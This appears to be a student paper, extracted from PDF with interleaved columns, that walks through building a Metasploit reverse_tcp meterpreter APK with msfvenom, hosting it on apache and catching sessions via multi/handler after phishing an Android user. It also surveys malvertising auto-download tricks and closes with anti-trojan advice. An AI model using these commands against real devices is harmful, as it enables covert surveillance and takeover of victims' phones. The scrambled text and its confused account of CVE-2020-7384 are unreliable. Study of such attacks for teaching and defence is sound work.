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Access Android Devices with the Metasploit Framework from Kali Linux OS

Article · July 2022

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1 author:

Senesh Wijayarathne
Sri Lanka Institute of Information Technology


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Access Android Devices with the Metasploit
Framework from Kali Linux OS
Senesh N. Wijayarathne
Sri Lanka Institute of Information Technology (SLIIT), Malabe, Sri Lanka

Abstract — This study focuses on how someone could use by the cyber attacker after the victim successfully downloads
the Rapid7’s Metasploit msfvenom framework to handle the malicious APK file to their Android devices.
malicious APK files and access android devices by using The CVE-2020-7384 vulnerability was described as
phishing or social engineering methods. This study uses a that would allow a malicious user to formulate and publish a
Kali Linux Virtual Machine (VM) and an Android 9.0 malicious APK file that was handled by Rapid7’s Metasploit
Virtual Machine. With the Android device user msfvenom framework that would execute arbitrary commands
downloading the malicious APK file that was generated on the victim’s Android device [3]. With a CVE score of 9.3,
and embedded using ‘msfvenom’ and ‘msfconsole,’ we this vulnerability was listed as one of the most critical
could receive sessions to the Android device. After the vulnerabilities [4]. Complexity and the Access type were
download is completed, we could gain access to the respectfully listed as Medium and Remote. The specific CWE
Android device due to the vulnerability that is known as ID for this vulnerability was listed as number CWE-77
CVE-2020-7384. This study will give details on how to (Improper Neutralization of Special Elements used in a
improve such malicious APK files to be more convincing. Command, also known as Command Injection [5])[4].
This study will contain precise information on related The rest of this paper is arranged as follows: Session
attacks for this mentioned vulnerability and a brief II, the ‘Methodology’ session, this session would provide
discussion of how to mitigate this type of vulnerability. details about how the research was conducted and how the
exploitation was done. Session III, the ‘Results’ session,
Keywords — Metasploit, Msfvenom, Malicious APK files, provides the data that was collected and the outcomes. This
Android Devices, Phishing, Social Engineering, Kali session would cover what types of commands could be
Linux, Virtual Machine, CVE-2020-7384. executed after the exploitation was successful. Session IV, the
final session is the ‘Discussion’ session, and this session
I. INTRODUCTION provides details about a related attack to this vulnerability and
The Android Operating System (OS) that runs on any how to mitigate such vulnerabilities.
Android device is based on a modification of the Open Source
Linux kernel. Since the start of Android version 1.0 in 2008
[1], Android devices and Android versions have been Exploiting an Android device via the internet with
improving and developing to the modern future. Currently, the the use of Rapid7’s Metasploit msfvenom framework by
Android version 13.0 was launched by Google on the 10th of hiding the malicious APK file as a Trojan malware is
February 2022 [2]. somewhat easier than other exploitations. For this trial exploit
This exploitation is simple but efficient exploitation to succeed we would require two Virtual Machines (VMs),
that uses the creativity of the cyber attacker. In this one for the attacker and one for the victim, and those VMs
exploitation, we would just be using an APK file with no should be respectively a Kali Linux machine and a machine
initial purposes rather than exploiting the vulnerability. Still, that runs on an Android Operating System (OS).
this APK file could be written as an application that would Knowing the Kali Linux VM IPv4 address is
benefit the victim to download and use. Then this malicious important for generating the malicious APK file. By executing
APK file could be downloaded to the victim’s device, acting the ‘ifconfig’ command on the terminal we could get the
as a trojan malware that contains a practical application for the IPv4 address for the Kali Linux VM. With knowing the IPv4
victim. address we could simply use the Rapid7’s Metasploit
This paper contains details on how to generate and msfvenom framework and generate a malicious APK file. The
embed an APK file and how to set the necessary information following command could be used to generate the necessary
and key factors for the exploitation to succeed. This paper APK file; ‘msfvenom -p android/meterpreter/revers
contains details on the victim who would download this e_tcp LHOST=[Host VM IP] LPORT=4444 R > /var/w
malicious APK file and what kind of commands could be run

ww/html/[APK File Name].apk.’ Figure 01 will display
the command and the generated output from that command.

Figure 01
Generating the APK file using msfvenom

Since this malicious APK file would be sent through

the Internet, the next step would be to start up the apache
server. ‘service apache2 start’ command will start up the Figure 03
apache server and we could check the status of the server by Setting the payload and viewing the Options
using the ‘service apache2 status’ command.
The next big step of this exploitation would be
launching the Metasploit msfconsole framework. By using the
command ‘msfconsole’ we could start the Metasploit
msfconsole framework. Figure 02 will display the loaded
Figure 04
Metasploit msfconsole framework. Starting the exploitation

Since we did not do any modifications to the APK

file to hide it as a Troaj Malware, it would be displayed
maliciously. Now, since the application is sent to the web we
could send the necessary malicious link to the user so that they
could download the malicious APK file to their Android
device. Since there are no modifications or improvements
were done to the APK file or the link that holds the APK file,
it would be obvious that this is a malicious file, but if those
necessary modifications and improvements have been made
the user would find it difficult to know or find about the APK
file without downloading it. In this scenario the malicious link
Figure 02
would be; ‘http://[Host VM IP]:[Port Number]/[APK
Loaded Metasploit msfconsole Framework
File Name].apk’ Figure 05 will display how it would be
shown at the moment for the user without any modifications
Using the multi-handler option under exploit with the
and improvements made.
previous payload would be the next step of this Android
exploitation. After the msfconsole framework has been loaded
we could use the following commands to set the payload;
‘use exploit/multi/handler,’ and ‘set payload android
/meterpreter/reverse_tcp.’ Figure 03 will display the
mentioned commands and the options that they generated.
Analyzing the options that were displayed we could
notice that the ‘LHOST’ is not set for an IPv4, since the
LHOST would be the listing VM or the Kali Linux VM we
could set the LHOST to the IPv4 address of the Kali Linux
VM. With that set, we have all the options we need for the
exploitation and we just have to type on the command
‘exploit’ to execute this attack. Figure 04 will display the
previously mentioned command and how the exploit would
start. Figure 05
Display when the user enters the link that holds the malicious APK

Entering the link with the malicious APK file would download it and use it. Another way to send a user a malicious
automatically download the file to the user’s memory card. APK file is to attach it to web advertisements and websites.
After the download is completed the user would have to install Another more efficient way is to get the download started
the malicious APK file to their system. After the installation is even without the user interaction. According to Andrew
done, and when the user clicks on the installed file, we could Brandt, a researcher at SophosLabs Principal, in 2016, the
get a session to the user’s Android device from our Kali Linux cyber security firm did witness for the first time an exploit kit
machine. So, simply like that we could exploit an Android that enables the installation of malicious APK files into
device. mobile devices without any user interaction and that
ransomware was named ‘Dogspectus’[6].
III. RESULTS The ransomware that was known as Dogspectus has
The malicious APK file was downloaded and only targeted Android devices, and the quest was to gain
installed on the Android device by the user, we could get iTunes gift cards from Apple. This ransomware was
sessions to the Android device on our Kali Linux machine. discovered when an older testing Android device (a Samsung
After receiving several sessions to one IPv4 address, we could Tablet that was running on the Cyanogenmod 10 version) was
use the command ‘sessions -i [session number]’ to get hit with a malicious advertisement loaded up with JavaScript
access to a specific session. With that, now we have access to pointing to the ransomware [6]. According to Blue Coat, at
the user’s Android device and we could start to execute least a number of 224 Android devices that were running on
malicious commands and get details and information about the versions 4.0.3 to 4.4.4 had been victims of this Trojan
victim. malware, and the ransom payment was two iTunes gift card
The easiest way to find what to do next and what codes from Apple that are worth $100 each [6].
commands could be executed on the Android device could be The Dogspectus Trojan ransomware was the first to
found under that session. By simply executing the ‘help’ reach a user's mobile devices via an auto-downloading
commands we could get all the details and commands that method, but it certainly was not the last [7]. In 2016, 318,000
could be executed. The command ‘help’ will display several devices were affected by the Svpeng Android banking trojan
types of commands, such as; malware. By discovering a flaw in Google Chrome, when
handing file downloads, the cyber attackers had executed this
1. Core Commands
trojan malware specifying only the Russians [7]. The Svpeng
2. Network Commands
authors had used malicious JavaScript to deliver their
3. File System Commands
malicious payload to the user via Google AdSense on Russian
4. User interface Commands
sites [7]. In general circumstances, the downloaded APK
5. System Commands
would have prompted the users to verify the location where
6. Audio Output Commands
they want the download to be saved, but authors on Svpend’s
7. Application Controller Commands
had uncovered that if they were to break the APK file into
8. Webcam Commands
blocks of 1024 bytes, the download would take place without
9. Under each type of command
notifying the user by Google Chrome for Android devices,
There would be several other commands with the and the malicious APK file would be reconstructed on the
description of what that command does with the execution of memory card of the user without their knowledge [7].
it. Just by typing the command that the attacker would require
would get it done with the help of the meterpreter session the
attacker is on.

In the previous sessions, session ‘Methodology’ and
the session ‘Results,’ it was shown how to generate and
embed a malicious APK file and how the victim would
download it for the attack to execute future; but with the
advancement of technology and cyber attackers thinking out
of the box to improve their attacks, newer ways, and more
efficient ways have been discovered that could be used to send
a malicious APK file to an Android device.
As discussed in the ‘Methodology’ session, cyber Figure 06
Svpeng Android Banking Trojan auto-downloading campaign activity
attackers could spend more time on the malicious APK file
and make the file useful for the victim so they would
Since Trojan Horse is used as a delivery device for

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quite a several different types of malware that serve different methods. Finally, I would like to thank my family members
purposes, you would have to look for many of the same for the support and encouragement that they showed when I
telltale signs if you suspect that your device may have been hit a roadblock during this paper.
breached by Trojan Horse Malware. A few of the things that
you used to look into include [8]: REFERENCES
● Flawed Device Performance - Is your mobile device or [1] J. R. Raphael, "Android versions: A living history from 1.0 to 13," 01
March 2022. [Online]. Available:
computer device crashing more often than usual or
running slow? [Accessed 25 May 2022].
● Strange Device Behavior - Does your mobile or [2] J. R. Raphael, "Android versions: A living history from 1.0 to 13," 01
computer device have unexplained processes being March 2022. [Online]. Available:
executed or have programs running that you did not e/3235946/android-versions-a-living-history-from-1-0-to-today.html?pa
ge=2 [Acce ssed 25 May 2022].
[3] "CVE-2020-7384," 21 January 2020. [Online]. Available: https://cve.
● Pop-up and Spam Interruptions - Are you noticing an [Accessed 25
uptick in the number of interruptions from email spam May 2022].
and web browser pop-ups? [4] "Rapid7 » Metasploit : Security Vulnerabilities," [Online]. Available:
If such symptoms are exhibited from your mobile id-36106/Rapid7-Metasploit.html. [Accessed 25 May 2022].
device or the computer device, it could be possible that your [5] "CVE-2020-7384 Detail," NVD NIST, 02 March 2021. [Online].
device is hosting a trojan virus. Try searching for applications, Available: 2020-7384. [Accessed
25 May 2022].
software, programs, or anything that you did not download or
[6] C. Osborne, "Dogspectus ransomware targets Android devices in the
install yourself on your device. You can also enter any quest for Apple iTunes gift cards," ZDNet, 25 April 2016. [Online].
unrecognized file names into an online search engine to Available:
determine whether they are recognized as Trojan malware [8]. -dogspectus-ransomware-to-android-devices/. [Accessed 25 May 2022]
Effective Cyber Security software and applications [7] C. Cimpanu, "Over 318,000 Android Users Affected by
Auto-Downloading Malvertising Attack," BleepingComp uter, 08
should be the front line of protecting your mobile device or
November 2016. [Online]. Available: https://www.bleepingcomputer.
computer device against the most common cyber security com/news/security/over-318-000-android-users-affected-by-auto-downl
threats. An effective internet security solution should have a oading-malvertising-attack/. [Accessed 25 May 2022].
few main features, which include: speed, frequent scans, and [8] "What is a Trojan Virus?," WEBROOT, [Online]. Available:
alert reports or notifications as soon as a Trojan Malware is us. [Accessed 18 May 2022].
detected [8]. A few best practices that you could do in
addition to installing verified cyber security software or
application to help keep yourself safe from Trojan Horse are;
● Only download or install software, programs, and Senesh Wijayarathne is a third-year undergraduate specializing in
applications from sources that you trust completely. Cyber Security from Sri Lanka Institute of Information
● Never open email attachments or execute programs sent Technology (SLIIT), Malabe, Sri Lanka. Senesh was the Vice
to you via email from someone you do not know. President for Incoming Global Volunteer - International Relations
● Do not miss any software updates or system updates on of AIESEC in SLIIT for the term 21.22.
your devices, be up to date with the latest patches. AIESEC is the world's largest youth-run
● Make sure to download and install a recommended organization. He is the author of one book
antivirus system and keep it running on your devices. that gives in-depth information about Bug
Bounty Programming & Web Security
I would like to take this time and space to thank
everyone who supported me and guided me on the right path Be in touch with Senesh:
for the success of this paper. I would like to especially thank Email:
the lecturers in charge of the module Mobile Security in Sri Instagram:
Lanka Institute of Information Technology - SLIIT in 2022,
Mr. Kavinga Yapa Abeywardena and Ms. Chethana Publications;
Liyanapathirana for providing guidance and help during Leanpub:
lectures and laboratory sessions. Researchgate:
I would also like to thank my friends who I would
talk to and discuss how to get some coding sessions done and
to get opinions about their approaches and mitigation

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